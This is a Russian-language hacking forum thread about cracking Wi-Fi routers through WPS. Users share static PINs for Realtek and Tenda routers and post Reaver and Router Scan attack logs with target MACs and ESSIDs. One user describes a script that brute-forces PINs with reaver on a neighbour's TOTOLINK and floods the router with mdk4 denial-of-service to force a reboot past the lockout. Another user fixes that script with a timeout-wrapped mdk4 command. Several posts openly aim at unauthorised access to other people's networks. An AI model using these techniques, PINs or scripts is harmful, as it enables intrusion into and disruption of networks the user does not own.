Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,228
    Reputations:
    116
    Открывается пустым пином через Router Scan (беспроводным аудитом, вкладка Wireless).
     
    Triton_Mgn, TOX1C, Payer and 2 others like this.
  2. Release the Kraken

    Joined:
    12 Apr 2019
    Messages:
    36
    Likes Received:
    5
    Reputations:
    0
    Так, а как ввести пустой пин?
     
  3. Release the Kraken

    Joined:
    12 Apr 2019
    Messages:
    36
    Likes Received:
    5
    Reputations:
    0
    Тааак
    Выражаю благодарность Бинарному мастеру.
    Даж не за помощь а за напоминание о том что можно снова воспользоватся РутерСкан

    Помню когда то давно начинал осваивать с него аудит. И он помог открыть первый доступ, потом перешел на Кали. И забыл про Рутерскан, даже не забыл, а просто использовал его в информационных целях, глянуть что за ситуация в округе.
    А зря. Ситуация поменялась с моих первых аудитов. И снова прошелся по точкам. Короче Серком 6688 и Empty WPS pin
     
    WELK, TOX1C, 4Fun and 1 other person like this.
  4. Piligrim740

    Piligrim740 Well-Known Member

    Joined:
    14 Aug 2016
    Messages:
    726
    Likes Received:
    5,112
    Reputations:
    15
    Аналогичная ситуация, не могу подобрать пин WPS к Tenda с МАС 58:D9:D5:24:FD:A1
    Сейчас WPS разлочен, не хотелось бы его грохнуть в Lock
    Подскажите, есть ли решение WPS для этих роутеров.

    RS показывает Realtek Wireless AP
    Эти пины уже пробовал :
    95661469 | Статичный PIN - Realtek 1
    95719115 | Статичный PIN - Realtek 2
    48563710 | Статичный PIN - Realtek 3
    50994953 | Airocon Realtek

    Не подходят, что меня ужасно расстроило.
    Пасс на точке жутко вредный, выкладывал на перебор - глухо :mad:
    Подскажите, кто владеет информацией.
     
    4Fun likes this.
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,228
    Reputations:
    116
    В телеграм чате Router Scan есть человек, который исследовал закономерности пинов на этих устройствах. Возможно тебе надо связаться с ним.

    Вот посмотри: https://github.com/drygdryg/TendaOnlinePIN
     
    4Fun, USER_X, Piligrim740 and 2 others like this.
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    965
    Likes Received:
    1,648
    Reputations:
    19
    10 попыток и уход в блокировку, после перезагрузки блокировка слетает.
    Для 58:D9:D5 ситуация осложняется тем, что их в базах 3wifi очень мало, и даже приблизительно собрать "поляну устройств", чтобы примерно подгадать пинкод, для них вряд ли получится.

    Генератор по ссылке выше практически бесполезен, для "устройства через одно" он предложил 40 пинкодов, и это только один раз. Для остальных 30 роутеров результата нет.
     
    USER_X, Monohrom, Piligrim740 and 3 others like this.
  7. Smiteboy

    Smiteboy New Member

    Joined:
    19 Feb 2020
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет. Листал я в общем эту тему и нашел старенький скрипт для брута пинов WPS. Вот как он должен работать:
    - reaver брутфорсит пины пока тот не залочится
    - mdk3 дудосит роутер до перезагрузки и анлока wps
    - reaver продолжает свою работу

    Решил я юзнуть его на соседнем тотолинке с открытым wps, но каждый раз mdk3 выдавал что то по типу "роут неуязвим" и зацикливался на этом
    Code:
    AP 14:4D:67:98:9A:48 is responding!        
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with   500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  1000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  1500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  2000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  2500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  3000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  3500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  4000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  4500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  5000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  5500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  6000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  6500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  7000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  7500 clients connected!

    Прогнав скрипт еще пару раз я заметил то что ривер продолжает брутит новые пины, затем промониторил airodumo-ng и оказалось что еще как уязвим. Роутер отваливался с первых сек дудоса, хотя mdk3 почему то видел с ним связь. Дальше я прогнал его на других тотолинках (около меня их целых 4 штуки) и все также. То есть выходит брутить можно, но не охота сидеть вручную выходить с mdk3. Я попробовал применить к mdk ключ -c (не проверять на успешность), но он все так же зацикливался, просто без вывода в терминал.

    Дальше я скачал и переписал скрипт под mdk4, но там так же это не пофиксили, просто изменили текст вывода и убрали ключ -с
    Code:
    BSSID = 14:4D:67:98:9A:48
    [+] reaver is working ...
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [+] Associated with 14:4D:67:98:9A:48 (ESSID: TOTOLINK_N300RT)
    Pins
    02595672
    02605678
    02615677
    02625676
    02635675
    02645674
    02655673
    02665672
    02675671
    02685670
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    [+] Mdk4 is working ...
    Connecting Client 00:30:65:37:D0:1E to target AP 14:4D:67:98:9A:48.
    Packets sent:      1 - Speed:    1 packets/sec
    Connecting Client 00:30:6E:46:4E:76 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:    427 - Speed:  426 packets/sec
    Connecting Client 00:50:DA:DA:A3:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   1820 - Speed: 1393 packets/sec
    Connecting Client 00:02:44:5B:0D:5F to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   3466 - Speed: 1646 packets/sec
    Connecting Client 00:02:2D:2D:DB:2D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   5100 - Speed: 1634 packets/sec
    Connecting Client 00:07:0E:0E:97:5F to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   6674 - Speed: 1574 packets/sec
    Connecting Client 00:01:E6:E8:D4:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   8279 - Speed: 1605 packets/sec
    Connecting Client 00:50:08:76:2A:F8 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   9910 - Speed: 1631 packets/sec
    Connecting Client 00:60:B3:8C:FB:FA to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  11537 - Speed: 1627 packets/sec
    Connecting Client 00:02:2D:2D:7A:56 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  13186 - Speed: 1649 packets/sec
    Connecting Client 00:30:BD:BD:00:95 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  14775 - Speed: 1589 packets/sec
    Connecting Client 00:01:38:FD:D2:7D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  16400 - Speed: 1625 packets/sec
    Connecting Client 00:50:DA:11:24:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  18013 - Speed: 1613 packets/sec
    Connecting Client 00:00:92:45:86:2A to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  19600 - Speed: 1587 packets/sec
    Connecting Client 00:08:21:72:1B:92 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  21181 - Speed: 1581 packets/sec
    Connecting Client 00:12:7F:EC:94:44 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  22817 - Speed: 1636 packets/sec
    Connecting Client 00:40:05:05:5E:8D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  24446 - Speed: 1629 packets/sec
    Connecting Client 00:40:05:05:AC:91 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  26040 - Speed: 1594 packets/sec

    Вот запуск mdk из скрипта, как можно в баш реализовать выход из цикла команды?
    Code:
    run_MDK4 (){
    echo [+] Mdk4 is working ...
    #gnome-terminal --geometry 10x10-1-1 --title='mdk4' -e "mdk4 wlan0mon a -a $BSSID -m"
    sleep 6                            #Время работы Mdk4
    killall mdk4 2> /dev/null
    echo [+] Mdk4 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
    sleep 5
    }
    
    В идеале если бы mdk работал без проверки на связь с точкой, а просто отправил --clients клиетов и завершал работу.
     
  8. VasiliyP

    VasiliyP Well-Known Member

    Joined:
    30 Aug 2011
    Messages:
    251
    Likes Received:
    458
    Reputations:
    7
    Завершить mdk через фиксированное время?
    Всё, что внутри run_MDK4() заменить на
    timeout -s SIGKILL 5 mdk4 wlan0mon a -a $BSSID -m
    5 - это время в секундах на его работу
     
  9. Smiteboy

    Smiteboy New Member

    Joined:
    19 Feb 2020
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    спасибо, its working ✌
     
  10. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    722
    Likes Received:
    700
    Reputations:
    4
    Интересно на tp link работает ? Есть возможность проверить ?
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,442
    Likes Received:
    9,228
    Reputations:
    116
    Monohrom, fandor9, 4Fun and 1 other person like this.
  12. Sliva

    Sliva New Member

    Joined:
    29 Mar 2019
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    binarymaster,
    подскажите, а в RS есть такая возможность брутить WPS Pin-ы и применять ДДОС атаку для перезагрузки роутера если он уходит в лок?
     
  13. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    964
    Likes Received:
    4,159
    Reputations:
    51
    Это в секретном меню.
    Там еще можно убрать ржавчину, залечить раны, получить диплом Сорбонны, сделать в розетке 220В, поменять доллары по 8,50 и вернуть девственность и неверного мужа. :D
    ----------
    RS в первую очередь сканер. В небольшой степени брутер (можно перебирать пароли).
    Никаких дидосов и других деструктивных действий он не делает.
     
    Vikhedgehog likes this.
  14. Sliva

    Sliva New Member

    Joined:
    29 Mar 2019
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
     
  15. 4Fun

    4Fun Member

    Joined:
    25 Jul 2018
    Messages:
    29
    Likes Received:
    40
    Reputations:
    0
    Такой возможности нет. Насколько я понимаю, чтобы это делать, требуется режим мониторинга и инъекция пакетов.
     
    binarymaster likes this.
  16. evel

    evel New Member

    Joined:
    23 Mar 2020
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    Столкнулся с проблемой, роутеры RT-GPON-ХХХХ с MAC адресами:
    70:FD:45:XX:XX:XX, 74:9D:79:XX:XX:XX

    Пробовал в РоутерСкане PINы "empty", "00000000". Доходит до M4 и дальше только Session timed out.
    Такое впечатление, что роутер уходит в лок. При следующей атаке уже только Session timed out. Из лока может выйти через несколько дней.
    [*] Audit started at 2020.03.21 10:32:01 (UTC+03:00).
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated with 74:9D:79:XX:XX:XX (ESSID: RT-GPON-XXXX).
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 61106AE9F790361C2271D87FAB4E6783
    [*] PKE: 1F0AD03C9B48A6653F779B13BDD9D4ACE88E5D2093D69D6F8CCDEC0AB1D9FD92C0FF1B292C187C466C9424613A454C3736141EC9E91BFA88D3E3157A87E77B78CE71EB65C8E8387594EDE4CEA92134A231DED21B514284FED9E08C91560F74005D28BAEB94176AE396EFC45481AFF2F7D81F392E3BC474554D09292A716A02A75DBC83D46A4C99B1A8809E08600CBD563C47FE616BE97D07E116D9A8A67F9B93B5E100BA6DACFBDFC7494A6D4044D14A74DFA4FA764DCFDBB5AECB147810EB1B
    [*] Manufacturer: Broadcom
    [*] Model Name: Broadcom
    [*] Model Number: 123456
    [*] Serial Number: 1234
    [*] Device Name: BroadcomAP
    [*] Sending WPS Message M2...
    [*] PKR: 125F7F79CBCFB7C1182291190AFBB34C2EB2F9E8BA5A2A02D0B56BDCE0DFEC2A79A6A615DD216B58A0FD3E76E22503799D7F1DBBF59EFD893FF132677D2BD20127CDF1C4CF44E2C9145278A5785C6E8880EE2E32669B9879CF5699DF6F3A9A3CFF23EB7EF4BA15AF59ECE89B803F21CB4FBEEA2FA0EEEC8DA342711EB1A85979FD247B8CE67D7E4515D4C44B78E76FB4D59656C5355E215849E6DF6EE90F93FB8571A10B1B18826B82B3560AEAF2FF417DC031A5E6665901603E274F6975D659
    [*] AuthKey: AD092FE17C897A35C7A4B07046B4FE97E406C5AB87946876CEECE2D466F06760
    [*] Received WPS Message M3.
    [*] E-Hash1: F9E8B9670EDA2C297D653A086CB7721E2F1C444FCA4B4509BA5A62CF97185990
    [*] E-Hash2: 053B1E1FDEB50933985BE0D7F6E2427F3EC098C72924FF61B76B9DEA0C51334C
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Session timed out.

    [*] Audit started at 2020.03.21 10:33:09 (UTC+03:00).
    [*] Associating with AP...
    [+] Associated with 74:9D:79:XX:XX:XX (ESSID: RT-GPON-XXXX).
    [*] Trying pin "00000000"...
    [-] Pixie Dust PIN not found.
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated with 74:9D:79:XX:XX:XX (ESSID: RT-GPON-XXXX).
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated with 74:9D:79:XX:XX:XX (ESSID: RT-GPON-XXXX).
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Reconnecting...

    Недавно встретился такой роутер. Не надо дожидаться когда выйдет из лока.
    [*] Audit started at 2020.03.21 10:29:14 (UTC+03:00).
    [*] Associating with AP...
    [+] Associated with 70:FD:45:XX:XX:XX (ESSID: RT-GPON-XXXX).
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 1497ACB8FE42929F932E187CEACC16CC
    [*] PKE: A1396D233048E7C857867E5053683272BE8A955A1C1BD307D769FDD7DAA6078DE093B9EE24F8295DBD63D1EB6DD284A0B56C42719B389614251BFEF215FED0C87D014A85B7C957640C1A345AE400A32E4A78EF3448EF08BFBD1924F1407C28E352BD37352E24D37F7BF27D4D00966AE0E8AF5B368EA58E26E7F78E742E0120A84AD62F0AEC265D3EF34D37ABD36EAB0A539644D5AC8707EC7ECE4F8FC534A1F6544C45545D192D5C66E4E020DCAFA3A955FFE65B43EC93A24D10FF01C579BBA7
    [*] Manufacturer: huaweitec
    [*] Model Name: WAP
    [*] Model Number: 123
    [*] Serial Number: 12345
    [*] Device Name: huawei_ONT
    [*] Sending WPS Message M2...
    [*] PKR: DCA659A54E36A0C64B21217E428457EFE63FF1B96D8BC86A754895581BDB36BBF72E38D40397C07B5299A5E90A7905054E948EB4BE8831CAE88EC862CE42E35B6D4C4BFB19403B1A81AE53B886A745939777E9CBA9CE28AD3D5427EE33E563AED47B6D725455E820C2BE4791EBDF21E686FE6FC6DAC2B4352643497F647348C03E71073492A2413E07E61735C081D1FC855ACF700706B25C600953CA905636459CD1FA59EC897C13FB2B18A62C47017599B95755E212663C4A2B67EF64E42055
    [*] AuthKey: D76DD7D1ED400FF2674F8A1DDC5675C8A662B0F457A1A6FB47A6993F81FA249F
    [*] Received WPS Message M1.
    [*] E-Nonce: 1497ACB8FE42929F932E187CEACC16CC
    [*] PKE: A1396D233048E7C857867E5053683272BE8A955A1C1BD307D769FDD7DAA6078DE093B9EE24F8295DBD63D1EB6DD284A0B56C42719B389614251BFEF215FED0C87D014A85B7C957640C1A345AE400A32E4A78EF3448EF08BFBD1924F1407C28E352BD37352E24D37F7BF27D4D00966AE0E8AF5B368EA58E26E7F78E742E0120A84AD62F0AEC265D3EF34D37ABD36EAB0A539644D5AC8707EC7ECE4F8FC534A1F6544C45545D192D5C66E4E020DCAFA3A955FFE65B43EC93A24D10FF01C579BBA7
    [*] Sending WPS Message M2...
    [*] PKR: DCA659A54E36A0C64B21217E428457EFE63FF1B96D8BC86A754895581BDB36BBF72E38D40397C07B5299A5E90A7905054E948EB4BE8831CAE88EC862CE42E35B6D4C4BFB19403B1A81AE53B886A745939777E9CBA9CE28AD3D5427EE33E563AED47B6D725455E820C2BE4791EBDF21E686FE6FC6DAC2B4352643497F647348C03E71073492A2413E07E61735C081D1FC855ACF700706B25C600953CA905636459CD1FA59EC897C13FB2B18A62C47017599B95755E212663C4A2B67EF64E42055
    [*] AuthKey: D76DD7D1ED400FF2674F8A1DDC5675C8A662B0F457A1A6FB47A6993F81FA249F
    [*] Received WSC NACK.
    [-] Error: Setup is locked.
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Setup is locked.
    [*] Sending WSC NACK...
    [*] EAP session closed.

    Хотелось услышать опытных. Не получиться уже эти роутеры взломать по WPS? И не достаточно данных которые выдаёт роутер для дальнейшего взлома другой программой?
     
  17. 4Fun

    4Fun Member

    Joined:
    25 Jul 2018
    Messages:
    29
    Likes Received:
    40
    Reputations:
    0
    Надеюсь, вы пробовали пустой пин-код (""), а не слово "empty"? В Router Scan для этого в поле для пин-кодов нужно вставить перенос строки (с помощью Enter).
     
    binarymaster likes this.
  18. evel

    evel New Member

    Joined:
    23 Mar 2020
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    Всё правильно, пробовал пустой, просто его так написал.
    Также пробовал взломать в Bully и Reaver, доходит до M4 и ошибка 0x02.

    P.S. и сканер не показывает что роутер в локе.
     
    #4658 evel, 24 Mar 2020 at 12:22 AM
    Last edited: 24 Mar 2020 at 12:28 AM
Loading...